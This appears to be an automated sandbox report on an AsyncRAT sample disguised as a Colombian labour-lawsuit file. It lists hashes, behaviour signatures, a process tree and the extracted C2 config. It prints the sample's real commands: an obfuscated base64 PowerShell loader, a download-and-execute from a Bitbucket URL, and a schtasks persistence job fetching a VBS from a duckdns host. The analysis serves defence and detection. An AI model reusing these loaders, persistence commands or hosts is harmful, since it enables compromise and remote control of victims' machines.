Overview

Score  Task / Sample            Platform
10     static
3      2 DEMNADA ...AL.exe      windows7-x64
10     2 DEMNADA ...AL.exe      windows10-2004-x64
10     2 DEMNADA ...32.dll      windows7-x64
3      2 DEMNADA ...32.dll      windows10-2004-x64
3      2 DEMNADA ...32.dll      windows7-x64
3      2 DEMNADA ...32.dll      windows10-2004-x64
3      2 DEMNADA ...ar.dll      windows7-x64
3      2 DEMNADA ...ar.dll      windows10-2004-x64
Analysis (score 3)

max time kernel: 148s
max time network: 149s
platform: windows7_x64
resource: win7-20240708-en
resource tags: arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
submitted: 30/08/2024, 16:47
Static task: static1
Behavioral task behavioral1: 2 DEMNADA LABORAL- JUZGADO 02 CIVIL DEL CIRCUITO RAMA JUDICIAL/1 DEMANADA LABORAL.exe (resource win7-20240708-en)
Behavioral task behavioral2: 2 DEMNADA LABORAL- JUZGADO 02 CIVIL DEL CIRCUITO RAMA JUDICIAL/1 DEMANADA LABORAL.exe (resource win10v2004-20240802-en)
Behavioral task behavioral3: 2 DEMNADA LABORAL- JUZGADO 02 CIVIL DEL CIRCUITO RAMA JUDICIAL/madHcNet32.dll (resource win7-20240708-en)
Behavioral task behavioral4: 2 DEMNADA LABORAL- JUZGADO 02 CIVIL DEL CIRCUITO RAMA JUDICIAL/madHcNet32.dll (resource win10v2004-20240802-en)
Behavioral task behavioral5: 2 DEMNADA LABORAL- JUZGADO 02 CIVIL DEL CIRCUITO RAMA JUDICIAL/mvrSettings32.dll (resource win7-20240708-en)
Behavioral task behavioral6: 2 DEMNADA LABORAL- JUZGADO 02 CIVIL DEL CIRCUITO RAMA JUDICIAL/mvrSettings32.dll (resource win10v2004-20240802-en)
Behavioral task behavioral7: 2 DEMNADA LABORAL- JUZGADO 02 CIVIL DEL CIRCUITO RAMA JUDICIAL/unrar.dll (resource win7-20240705-en)
Behavioral task behavioral8: 2 DEMNADA LABORAL- JUZGADO 02 CIVIL DEL CIRCUITO RAMA JUDICIAL/unrar.dll (resource win10v2004-20240802-en)
General

Target: 2 DEMNADA LABORAL- JUZGADO 02 CIVIL DEL CIRCUITO RAMA JUDICIAL/1 DEMANADA LABORAL.exe
Size: 3.1MB
MD5: b841d408448f2a07f308ced1589e7673
SHA1: f5b5095c0ed69d42110df6d39810d12b1fa32a1e
SHA256: 69a90665113bd73b30360d87f7f6ed2c789a90a67f3b6e86474e21273a64f699
SHA512: a689734048109ab7bec9491bbb7781686c19c7885166b3ca2975e2f49e956fcc388cd8ca85a4e5a8bf9efe6056f1e0d80197b7f521d4f0d4cadb10ba9ef1fa93
SSDEEP: 49152:pvFg5qg9BtIAHE3SM4ahx6LK2SamuZob+tCjNrv8:Jm5qGBHBLRKuZfkjNrv8
Malware Config

Extracted
URL: https://bitbucket.org/556ghfhgfhgf/fdsfdsf/downloads/dllhope.txt

Extracted
Family: asyncrat
Version: | CRACKED BY https://t.me/xworm_v2
Botnet: Default
C2: enviasept.duckdns.org:3030
Mutex: AsyncMutex_6SI8OkPnk
Attributes:
- delay: 3
- install: false
- install_folder: %AppData%
Signatures

Process spawned unexpected child process (2 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
description | pid | pid_target | Process | procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 2768 | 2800 | schtasks.exe | 40
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 2660 | 2800 | schtasks.exe | 40

Blocklisted process makes network request (2 IoCs)
flow | pid | Process
13 | 1716 | powershell.exe
14 | 1716 | powershell.exe

Command and Scripting Interpreter: PowerShell (2 IoCs)
pid | Process
1788 | powershell.exe
1716 | powershell.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 3 IoCs)
flow | ioc
12 | bitbucket.org
13 | bitbucket.org
14 | bitbucket.org

Suspicious use of SetThreadContext (2 IoCs)
description | pid | Process | procid_target
PID 2500 set thread context of 2000 | 2500 | 1 DEMANADA LABORAL.exe | 30
PID 2000 set thread context of 2628 | 2000 | cmd.exe | 33

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery (1 TTPs, 8 IoCs)
Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | WScript.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | WScript.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 1 DEMANADA LABORAL.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | MSBuild.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | WScript.exe

Scheduled Task/Job: Scheduled Task (1 TTPs, 2 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
2768 | schtasks.exe
2660 | schtasks.exe

Suspicious behavior: EnumeratesProcesses (11 IoCs)
pid | Process
2500 | 1 DEMANADA LABORAL.exe
2500 | 1 DEMANADA LABORAL.exe
2500 | 1 DEMANADA LABORAL.exe
2500 | 1 DEMANADA LABORAL.exe
2000 | cmd.exe
2000 | cmd.exe
1788 | powershell.exe
2628 | MSBuild.exe
1716 | powershell.exe
2628 | MSBuild.exe
2628 | MSBuild.exe

Suspicious behavior: MapViewOfSection (3 IoCs)
pid | Process
2500 | 1 DEMANADA LABORAL.exe
2000 | cmd.exe
2000 | cmd.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 2628 | MSBuild.exe
Token: SeDebugPrivilege | 1788 | powershell.exe
Token: SeDebugPrivilege | 1716 | powershell.exe

Suspicious use of WriteProcessMemory (31 IoCs; identical rows collapsed with their counts)
description | pid | Process | procid_target
PID 2500 wrote to memory of 2000 | 2500 | 1 DEMANADA LABORAL.exe | 30 (5 rows)
PID 2000 wrote to memory of 2628 | 2000 | cmd.exe | 33 (6 rows)
PID 2628 wrote to memory of 768 | 2628 | MSBuild.exe | 35 (4 rows)
PID 768 wrote to memory of 1788 | 768 | WScript.exe | 36 (4 rows)
PID 1788 wrote to memory of 1716 | 1788 | powershell.exe | 38 (4 rows)
PID 2628 wrote to memory of 2796 | 2628 | MSBuild.exe | 39 (4 rows)
PID 2628 wrote to memory of 2656 | 2628 | MSBuild.exe | 43 (4 rows)

Uses Task Scheduler COM API (1 TTPs)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes

Level 1: C:\Users\Admin\AppData\Local\Temp\2 DEMNADA LABORAL- JUZGADO 02 CIVIL DEL CIRCUITO RAMA JUDICIAL\1 DEMANADA LABORAL.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\2 DEMNADA LABORAL- JUZGADO 02 CIVIL DEL CIRCUITO RAMA JUDICIAL\1 DEMANADA LABORAL.exe"
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID: 2500

  Level 2: C:\Windows\SysWOW64\cmd.exe
  Command line: C:\Windows\SysWOW64\cmd.exe
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID: 2000

    Level 3: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    Command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 2628

      Level 4: C:\Windows\SysWOW64\WScript.exe
      Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\riwmef.vbs"
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory
      PID: 768
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J▒Bi▒GU▒YwBs▒HY▒I▒▒9▒C▒▒Jw▒w▒Cc▒Ow▒k▒Gs▒YgB1▒G8▒aQ▒g▒D0▒I▒▒n▒CU▒c▒B6▒EE▒YwBP▒Gc▒SQBu▒E0▒cg▒l▒Cc▒OwBb▒EI▒eQB0▒GU▒WwBd▒F0▒I▒▒k▒G4▒YQBn▒HI▒b▒▒g▒D0▒I▒Bb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QwBv▒G4▒dgBl▒HI▒d▒Bd▒Do▒OgBG▒HI▒bwBt▒EI▒YQBz▒GU▒Ng▒0▒FM▒d▒By▒Gk▒bgBn▒Cg▒I▒▒o▒E4▒ZQB3▒C0▒TwBi▒Go▒ZQBj▒HQ▒I▒BO▒GU▒d▒▒u▒Fc▒ZQBi▒EM▒b▒Bp▒GU▒bgB0▒Ck▒LgBE▒G8▒dwBu▒Gw▒bwBh▒GQ▒UwB0▒HI▒aQBu▒Gc▒K▒▒n▒Gg▒d▒B0▒H▒▒cw▒6▒C8▒LwBi▒Gk▒d▒Bi▒HU▒YwBr▒GU▒d▒▒u▒G8▒cgBn▒C8▒NQ▒1▒DY▒ZwBo▒GY▒a▒Bn▒GY▒a▒Bn▒GY▒LwBm▒GQ▒cwBm▒GQ▒cwBm▒C8▒Z▒Bv▒Hc▒bgBs▒G8▒YQBk▒HM▒LwBk▒Gw▒b▒Bo▒G8▒c▒Bl▒C4▒d▒B4▒HQ▒Jw▒p▒Ck▒OwBb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QQBw▒H▒▒R▒Bv▒G0▒YQBp▒G4▒XQ▒6▒Do▒QwB1▒HI▒cgBl▒G4▒d▒BE▒G8▒bQBh▒Gk▒bg▒u▒Ew▒bwBh▒GQ▒K▒▒k▒G4▒YQBn▒HI▒b▒▒p▒C4▒RwBl▒HQ▒V▒B5▒H▒▒ZQ▒o▒Cc▒QwBs▒GE▒cwBz▒Ew▒aQBi▒HI▒YQBy▒Hk▒Mw▒u▒EM▒b▒Bh▒HM▒cw▒x▒Cc▒KQ▒u▒Ec▒ZQB0▒E0▒ZQB0▒Gg▒bwBk▒Cg▒JwBa▒Hg▒SwBI▒Ec▒Jw▒p▒C4▒SQBu▒HY▒bwBr▒GU▒K▒▒k▒G4▒dQBs▒Gw▒L▒▒g▒Fs▒bwBi▒Go▒ZQBj▒HQ▒WwBd▒F0▒I▒▒o▒Cc▒d▒B4▒HQ▒LgBz▒HM▒bwBj▒G0▒ZQBy▒C8▒cwBk▒GE▒bwBs▒G4▒dwBv▒GQ▒LwBy▒GY▒aQBk▒HY▒cgBl▒HM▒LwB0▒Gc▒ZwBn▒HI▒YQBj▒HM▒ZQBk▒C8▒ZwBy▒G8▒LgB0▒GU▒awBj▒HU▒YgB0▒Gk▒Yg▒v▒C8▒OgBz▒H▒▒d▒B0▒Gg▒Jw▒g▒Cw▒I▒▒k▒Gs▒YgB1▒G8▒aQ▒g▒Cw▒I▒▒n▒F8▒XwBf▒F8▒XwBm▒GQ▒ZwBo▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒Jw▒s▒C▒▒J▒Bi▒GU▒YwBs▒HY▒L▒▒g▒Cc▒MQ▒n▒Cw▒I▒▒n▒FI▒bwBk▒GE▒Jw▒g▒Ck▒KQ▒7▒▒==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\riwmef.vbs');powershell -command $KByHL;5⤵
        - Command and Scripting Interpreter: PowerShell
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        PID: 1788
          Level 6: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$beclv = '0';$kbuoi = 'C:\Users\Admin\AppData\Local\Temp\riwmef.vbs';[Byte[]] $nagrl = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://bitbucket.org/556ghfhgfhgf/fdsfdsf/downloads/dllhope.txt'));[system.AppDomain]::CurrentDomain.Load($nagrl).GetType('ClassLibrary3.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.ssocmer/sdaolnwod/rfidvres/tgggracsed/gro.tekcubtib//:sptth' , $kbuoi , '_____fdgh__________________-------------', $beclv, '1', 'Roda' ));"
          - Blocklisted process makes network request
          - Command and Scripting Interpreter: PowerShell
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 1716
      Level 4: C:\Windows\SysWOW64\WScript.exe
      Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\lmsftv.wsf"
      - System Location Discovery: System Language Discovery
      PID: 2796
      Level 4: C:\Windows\SysWOW64\WScript.exe
      Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fybscp.wsf"
      - System Location Discovery: System Language Discovery
      PID: 2656
Level 1: C:\Windows\system32\schtasks.exe
Command line: schtasks /create /sc MINUTE /mo 40 /tn "google actualizacion2024 Tas" /tr "\"%windir%\system32\WindowsPowershell\v1.0\powershell.exe\" -Windowstyle Hidden $a = wget 'http://sostenermio2024.duckdns.org/31agosto.vbs' -o C:\Windows\Temp\q.vbs;start-sleep 5;start-Process C:\Windows\Temp\q.vbs
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID: 2768
Level 1: C:\Windows\system32\schtasks.exe
Command line: schtasks /create /sc MINUTE /mo 40 /tn "google actualizacion2024 Tas" /tr "\"%windir%\system32\WindowsPowershell\v1.0\powershell.exe\" -Windowstyle Hidden $a = wget 'http://sostenermio2024.duckdns.org/31agosto.vbs' -o C:\Windows\Temp\q.vbs;start-sleep 5;start-Process C:\Windows\Temp\q.vbs
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID: 2660
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 70KB
MD5: 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1: 1723be06719828dda65ad804298d0431f6aff976
SHA256: b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512: bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Filesize: 181KB
MD5: 4ea6026cf93ec6338144661bf1202cd1
SHA1: a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256: 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512: 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Filesize: 780KB
MD5: 5cc7800fabf041f4f6a02e2b5a4d5460
SHA1: 411b5973f756b375d1f587a5fd69c27a9b754510
SHA256: ebf079a35687be6e9de0aad3adfb5a63f834ee93b6f7e5b7998b55fc75be1ee3
SHA512: 0864e631c778c2c8622eaa24b9cbf0dc15342474bba71a0b77b9ff3f5dbc2951407d1a21f0f94e58b41f9837644860154499442f03175821c2aad9509ec46358

Filesize: 164KB
MD5: 2e3704d10448cd561922b7561e6ec94c
SHA1: fd831fdcb2e0dd360b4765466d5384a1b3fa3ac1
SHA256: 2b982915d800128a0149437f42684068a781e133ad607889f932fc9bec04b086
SHA512: fc8f204d28ed1494894008b7417885a5df8b5fb99c99f56cf9a8deee935334759576d7b2b840d1c8b004d3e4c9ad27fe0036b1b7a4d806c5666d5c1acebb9852

Filesize: 11.3MB
MD5: 4195393370dff560c647cea03c986705
SHA1: 7fcbf81466c0dc1760205570c1248f80466da3f9
SHA256: 7a82d66ac151f833b0b617777c883c9e02cf88d90b9394ec39ec6f80599e34e5
SHA512: 2a74330dea0b751b7096fff9e08deee5122e66c6e5febb94dd97dfc5c3f9d51614f6eb6057c7d2bdec64f9d24e744871a3a050c6f129b77e2e6b845d0c6f4f91

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize: 7KB
MD5: af3a6ecde36e623fe383608b58e8995a
SHA1: cca2ee93a3153d8de2426b9c958883e500b42218
SHA256: cc337f84cc15a7b6d9f6c76e68a505dd105dd40d7d86176dbce58684e50731d7
SHA512: 6433384a699d557c5bfde482adb29a90689db1460d832928bbf76fff5f3380b30eba43689d1a3624b2a26dc3100b1a0e5ad196c29d8e52f8fae95a27d04b6858